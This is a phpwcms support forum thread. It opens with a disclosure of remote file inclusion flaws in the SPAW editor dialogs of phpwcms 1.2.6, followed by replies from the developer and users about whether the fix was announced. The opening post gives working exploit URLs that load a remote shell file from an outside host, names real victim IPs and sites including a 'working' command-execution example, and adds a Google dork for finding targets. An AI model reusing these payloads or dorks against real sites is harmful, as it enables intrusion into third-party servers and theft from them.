phpwcms Support Forum

PhpwCMS 1.2.6 <= Multiple Remote file inclusion vulnerabilities

Vuln In :
include $spaw_root.'class/lang.class.php';

Affected Files :
include/inc_ext/spaw/dialogs/table.php
include/inc_ext/spaw/dialogs/a.php
include/inc_ext/spaw/dialogs/colorpicker.php
include/inc_ext/spaw/dialogs/confirm.php
include/inc_ext/spaw/dialogs/img.php
include/inc_ext/spaw/dialogs/img_library.php
include/inc_ext/spaw/dialogs/td.php

Vendor Website: http://www.phpwcms.de/

PoC:
http://victim-site/include/inc_ext/spaw ... ttp://ehmo
rgan.net/shell.dat?

Example:
http://132.195.14.67/phpwcms/include/in ... paw_root=h
ttp://ehmorgan.net/shell.dat?

Example working:
http://www.acvz.com/phpwcms/include/inc ... xt?&cmd=id

Google Dork:

inurl:"phpwcms/index.php?id="

This One was hacked today by some hackers > http://www.saalburg-ebersdorf.de/phpwcm ... 10,0,0,1,0

Fix it Quickliy

A bit late message - this is a known thing and it is fixed. Check current release here.

Oliver

I have called the webmaster saalburg-ev..... via e-Mail, but no answer.
His site is up, and I hope updated. ........

Schulterzuck.

Knut

Oliver Georgi wrote:A bit late message - this is a known thing and it is fixed. Check current release here.

Oliver

yeah... but you must tell people that you have fixed an critical security bug an that they must update as quickly as possible.

kingless wrote:

Oliver Georgi wrote:A bit late message - this is a known thing and it is fixed. Check current release here.

Oliver

yeah... but you must tell people that you have fixed an critical security bug an that they must update as quickly as possible.

hello

all get an mail! in the forum was a big thread, at the projectsite there was also infos about that and last also at the docu page!